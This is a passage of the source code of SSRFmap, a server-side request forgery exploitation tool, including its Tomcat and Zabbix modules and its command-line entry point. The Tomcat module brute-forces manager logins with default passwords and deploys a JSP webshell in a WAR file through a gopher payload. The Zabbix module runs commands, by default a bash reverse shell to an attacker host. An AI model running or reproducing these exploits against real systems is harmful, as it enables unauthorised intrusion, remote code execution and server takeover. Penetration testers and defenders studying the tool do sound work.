requester.do_request(args.param, payload) -------------------------------------------------------------------------------- /modules/tomcat.py: -------------------------------------------------------------------------------- 1 | from core.utils import * 2 | import argparse 3 | import base64 4 | import binascii 5 | import getopt 6 | import logging 7 | import re 8 | import sys 9 | import urllib 10 | import zipfile 11 | 12 | 13 | # NOTE 14 | # This exploit is a Python 3 version of Pimps script 15 | # with a simple bruteforcer and auto exploiter 16 | # https://github.com/pimps/gopher-tomcat-deployer 17 | 18 | name = "tomcat" 19 | description = "Tomcat - Bruteforce manager and WAR uploader" 20 | author = "Swissky" 21 | documentation = [ 22 | "https://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html", 23 | "https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown", 24 | "https://github.com/pimps/gopher-tomcat-deployer" 25 | ] 26 | 27 | class exploit(): 28 | SERVER_HOST = "127.0.0.1" 29 | SERVER_PORT = "8888" 30 | SERVER_TOMCAT = "manager/html" 31 | SERVER_USER = "tomcat" 32 | SERVER_PASS = "tomcat" 33 | EXPLOIT_JSP = "data/cmd.jsp" 34 | EXPLOIT_WAR = "/tmp/cmd.war" 35 | tomcat_user = ["tomcat", "admin", "both", "manager", "role1", "role", "root"] 36 | tomcat_pass = ["password", "tomcat", "admin", "manager", "role1", "changethis", "changeme", "r00t", "root", "s3cret","Password1", "password1"] 37 | 38 | def __init__(self, requester, args): 39 | logging.info(f"Module '{name}' launched !") 40 | self.args = args 41 | 42 | # Using a generator to create the host list 43 | gen_host = gen_ip_list(self.SERVER_HOST, args.level) 44 | for ip in gen_host: 45 | for usr in self.tomcat_user: 46 | for pss in self.tomcat_pass: 47 | payload = wrapper_http(self.SERVER_TOMCAT, ip, self.SERVER_PORT, usernm=usr, passwd=pss) 48 | r = requester.do_request(args.param, payload) 49 | 50 | if r != None and not "s3cret" in r.text: 51 | logging.info(f"Found credential \033[32m{usr}\033[0m:\033[32m{pss}\033[0m") 52 | self.SERVER_USER = usr 53 | self.SERVER_PASS = pss 54 | 55 | # bruteforce padding for a good zip file 56 | # worst solution until I find an alternate 57 | # way to convert the is_ascii from the original 58 | # Python 2 payload 59 | for i in range(5): 60 | payload = self.send_war(i) 61 | r = requester.do_request(args.param, payload) 62 | 63 | if args.verbose == True: 64 | logging.info(f"Generated payload : {payload}") 65 | 66 | logging.info(f"Sending CMD to cmd.jsp for padding: {i}") 67 | payload = wrapper_http("cmd/cmd.jsp?cmd=whoami", self.SERVER_HOST, self.SERVER_PORT) 68 | r = requester.do_request(args.param, payload) 69 | if r.text != None and r.text != "": 70 | logging.info(r.text) 71 | break 72 | 73 | 74 | def send_war(self, padding): 75 | with open(self.EXPLOIT_JSP, 'r') as f: 76 | webshell_data = f.read() 77 | webshell_data = self.validate_webshell_length_and_crc32(webshell_data + ' '*padding) 78 | 79 | if self.args.verbose == True: 80 | logging.info("[+] Creating new zip file: " + self.EXPLOIT_WAR) 81 | self.create_war_zip_file(self.EXPLOIT_WAR, self.EXPLOIT_JSP, webshell_data) 82 | 83 | if self.args.verbose == True: 84 | logging.info("[+] Valid WAR file generated... Creating the gopher payload now...") 85 | gopher_payload = self.build_gopher_payload() 86 | 87 | return wrapper_gopher(gopher_payload, self.SERVER_HOST, self.SERVER_PORT) 88 | 89 | def create_war_zip_file(self, war_filename,inputfile,webshell_data): 90 | warzip = zipfile.ZipFile(war_filename,'w') 91 | # Write a known good date/war_filename stamp 92 | # this date/time does not contain and invalid byte values 93 | info = zipfile.ZipInfo(inputfile,date_time=(1980, 1, 1, 0, 0, 0)) 94 | # Write out the webshell the zip file. 95 | warzip.writestr(info,webshell_data) 96 | warzip.close() 97 | 98 | def validate_webshell_length_and_crc32(self, webshell_data): 99 | valid_length=0 100 | valid_crc32=0 101 | modded_length=0 102 | 103 | if self.args.verbose == True: 104 | logging.info(f"Original file length: {len(webshell_data):08X}") 105 | logging.info(f"Original file crc32: {binascii.crc32(webshell_data.encode())& 0xffffffff:x}") 106 | 107 | while valid_length == 0 or valid_crc32 == 0: 108 | crc_string = f"{binascii.crc32(webshell_data.encode())& 0xffffffff:x}" 109 | ws_len_byte_string = f"{len(webshell_data):08X}" 110 | valid_length=1 111 | valid_crc32=1 112 | lead_byte_locations = [0,2,4,6] 113 | for x in lead_byte_locations: 114 | try: 115 | if(ws_len_byte_string[x] == '8' or ws_len_byte_string[x] == '9' or crc_string[x] == '8' or crc_string[x] == '9'): 116 | webshell_data = webshell_data+" " 117 | valid_length = 0 118 | valid_crc32 = 0 119 | modded_length = modded_length+1 120 | except: 121 | continue 122 | 123 | if modded_length > 0: 124 | logging.info("The input file CRC32 or file length contained an invalid byte.") 125 | logging.info("Length adjustment completed. " + str(modded_length) + " whitespace ' ' chars were added to the webshell input.") 126 | logging.info(f"New file length: {len(webshell_data):08X}") 127 | logging.info(f"New file crc32: {binascii.crc32(webshell_data.encode())& 0xffffffff:x}") 128 | return webshell_data 129 | 130 | def url_encode_all(self, string): 131 | return "".join([f"%{ord(char):0>2x}" for char in string]) 132 | 133 | def build_gopher_payload(self): 134 | warfile = "" 135 | with open(self.EXPLOIT_WAR, 'rb') as f: 136 | warfile = f.read() 137 | 138 | headers = 'POST /manager/html/upload HTTP/1.1\r\n' 139 | headers += 'Host: {host}:{port}\r\n' 140 | headers += 'Content-Type: multipart/form-data; boundary=---------------------------1510321429715549663334762841\r\n' 141 | headers += 'Content-Length: {contentlength}\r\n' 142 | headers += 'Authorization: Basic {credential}\r\n' 143 | headers += 'Connection: close\r\n' 144 | headers += 'Upgrade-Insecure-Requests: 1\r\n' 145 | headers += '\r\n' 146 | headers += '{content_body}' 147 | 148 | content = '-----------------------------1510321429715549663334762841\r\n' 149 | content += 'Content-Disposition: form-data; name="deployWar"; filename="{filename}"\r\n' 150 | content += 'Content-Type: application/octet-stream\r\n' 151 | content += '\r\n' 152 | content += '{warfile}\r\n' 153 | content += '-----------------------------1510321429715549663334762841--\r\n' 154 | 155 | content_body = content.format( 156 | filename=self.EXPLOIT_WAR, 157 | warfile=warfile 158 | ) 159 | payload = headers.format( 160 | host=self.SERVER_HOST, 161 | port=self.SERVER_PORT, 162 | credential=base64.b64encode((self.SERVER_USER + ":" + self.SERVER_PASS).encode()), 163 | contentlength=len(content_body), 164 | content_body=content_body 165 | ) 166 | return self.url_encode_all(payload) -------------------------------------------------------------------------------- /modules/zabbix.py: -------------------------------------------------------------------------------- 1 | from core.utils import * 2 | import logging 3 | import urllib.parse as urllib 4 | 5 | # NOTE 6 | # Require `EnableRemoteCommands = 1` on the Zabbix service 7 | 8 | name = "zabbix" 9 | description = "Zabbix RCE" 10 | author = "Swissky" 11 | documentation = [] 12 | 13 | class exploit(): 14 | cmd = "bash -i >& /dev/tcp/SERVER_HOST/SERVER_PORT 0>&1" 15 | 16 | def __init__(self, requester, args): 17 | logging.info(f"Module '{name}' launched !") 18 | 19 | cmd = input("Give command to execute (Enter for Reverse Shell): ") 20 | if cmd == "": 21 | if args.lhost == None: 22 | self.cmd = self.cmd.replace("SERVER_HOST", input("Server Host:")) 23 | else: 24 | self.cmd = self.cmd.replace("SERVER_HOST", args.lhost) 25 | 26 | if args.lport == None: 27 | self.cmd = self.cmd.replace("SERVER_PORT", input("Server Port:")) 28 | else: 29 | self.cmd = self.cmd.replace("SERVER_PORT", args.lport) 30 | else: 31 | self.cmd = cmd 32 | 33 | # Data for the service 34 | gen_host = gen_ip_list("127.0.0.1", args.level) 35 | for ip in gen_host: 36 | port = "10050" 37 | self.cmd = urllib.quote_plus(self.cmd).replace("+","%20") 38 | self.cmd = self.cmd.replace("%2F","/") 39 | self.cmd = self.cmd.replace("%25","%") 40 | self.cmd = self.cmd.replace("%3A",":") 41 | data = "system.run[(" + self.cmd + ");sleep 2s]" 42 | 43 | payload = wrapper_gopher(data, ip , port) 44 | logging.info(f"Generated payload : {payload}") 45 | 46 | # Send the payload 47 | r = requester.do_request(args.param, payload) -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==3.0.3 2 | requests==2.31.0 3 | dnslib==0.9.24 4 | dnspython==2.6.1 5 | tldextract==5.1.2 -------------------------------------------------------------------------------- /screenshot/networkscan_example_ssrf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/SSRFmap/99fac918959240b62a0d6dbf479b8f44d2f8bd9e/screenshot/networkscan_example_ssrf.png -------------------------------------------------------------------------------- /screenshot/readfiles_example_ssrf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/SSRFmap/99fac918959240b62a0d6dbf479b8f44d2f8bd9e/screenshot/readfiles_example_ssrf.png -------------------------------------------------------------------------------- /screenshot/tomcat_example_ssrf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/swisskyrepo/SSRFmap/99fac918959240b62a0d6dbf479b8f44d2f8bd9e/screenshot/tomcat_example_ssrf.png -------------------------------------------------------------------------------- /ssrfmap.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | from core.ssrf import SSRF 3 | import argparse 4 | import logging 5 | import urllib3 6 | from pathlib import Path 7 | import os 8 | 9 | def display_banner(): 10 | print(r" _____ _________________ ") 11 | print(r"/ ___/ ___| ___ \ ___| ") 12 | print(r"\ `--.\ `--.| |_/ / |_ _ __ ___ __ _ _ __ ") 13 | print(r" `--. \`--. \ /| _| '_ ` _ \ / _` | '_ \ ") 14 | print(r"/\__/ /\__/ / |\ \| | | | | | | | (_| | |_) |") 15 | print(r"\____/\____/\_| \_\_| |_| |_| |_|\__,_| .__/ ") 16 | print(r" | | ") 17 | print(r" |_| ") 18 | 19 | def parse_args(): 20 | example_text = '''Examples: 21 | python ssrfmap.py -r examples/request2.txt -p url -m portscan 22 | python ssrfmap.py -r examples/request.txt -p url -m redis 23 | python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent" 24 | python ssrfmap.py -r examples/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242 25 | python ssrfmap.py -r examples/request.txt -p url -m readfiles --rfiles 26 | ''' 27 | parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter) 28 | parser.add_argument('-r', action ='store', dest='reqfile', help="SSRF Request file", required=True) 29 | parser.add_argument('-p', action ='store', dest='param', help="SSRF Parameter to target", required=True) 30 | parser.add_argument('-m', action ='store', dest='modules', help="SSRF Modules to enable") 31 | parser.add_argument('-l', action ='store', dest='handler', help="Start an handler for a reverse shell", nargs='?', const='1') 32 | parser.add_argument('-v', action ='store_true', dest='verbose', help="Enable verbosity") 33 | parser.add_argument('--lhost', action ='store', dest='lhost', help="LHOST reverse shell or IP to target in the network") 34 | parser.add_argument('--lport', action ='store', dest='lport', help="LPORT reverse shell or port to target in the network") 35 | parser.add_argument('--ldomain', action ='store', dest='ldomain', help="Domain to target for AXFR query or domain related modules") 36 | parser.add_argument('--rfiles', action ='store', dest='targetfiles', help="Files to read with readfiles module", nargs='?', const=True) 37 | parser.add_argument('--uagent',action ='store', dest='useragent', help="User Agent to use") 38 | parser.add_argument('--ssl', action ='store', dest='ssl', help="Use HTTPS without verification", nargs='?', const=True) 39 | parser.add_argument('--proxy', action ='store', dest='proxy', help="Use HTTP(s) proxy (ex: http://localhost:8080)") 40 | parser.add_argument('--level', action ='store', dest='level', help="Level of test to perform (1-5, default: 1)", nargs='?', const=1, default=1, type=int) 41 | parser.add_argument('--logfile', action ='store', dest='logfile', help="SSRFmap Log file") 42 | results = parser.parse_args() 43 | return results 44 | 45 | 46 | if __name__ == "__main__": 47 | # disable ssl warning for self signed certificate 48 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 49 | display_banner() 50 | 51 | args = parse_args() 52 | args.reqfile = os.path.abspath(args.reqfile) 53 | 54 | # set logfile default location to SSRFmap.log next to ssrfmap.py 55 | if args.logfile is None : 56 | log_file_path = str(Path(__file__).resolve().parent) + "/SSRFmap.log" 57 | else : 58 | log_file_path = args.logfile 59 | 60 | print(f"[INFO] Log file '{log_file_path}'") 61 | # enable custom logging 62 | try : 63 | logging.basicConfig( 64 | level=logging.INFO, 65 | format="[%(levelname)s]:%(message)s", 66 | handlers=[ 67 | logging.FileHandler(log_file_path, mode='w'), 68 | logging.StreamHandler() 69 | ] 70 | ) 71 | # handle permission denied on logfile 72 | except Exception as e: 73 | print(f'{e}') 74 | 75 | logging.addLevelName(logging.WARNING, "\033[1;31m%s\033[1;0m" % logging.getLevelName(logging.WARNING)) 76 | logging.addLevelName(logging.ERROR, "\033[1;41m%s\033[1;0m" % logging.getLevelName(logging.ERROR)) 77 | 78 | # handle verbosity 79 | if args.verbose is True: 80 | logging.getLogger().setLevel(logging.DEBUG) 81 | logging.debug("Verbose output is enabled") 82 | 83 | # SSRFmap 84 | ssrf = SSRF(args) 85 | 86 | --------------------------------------------------------------------------------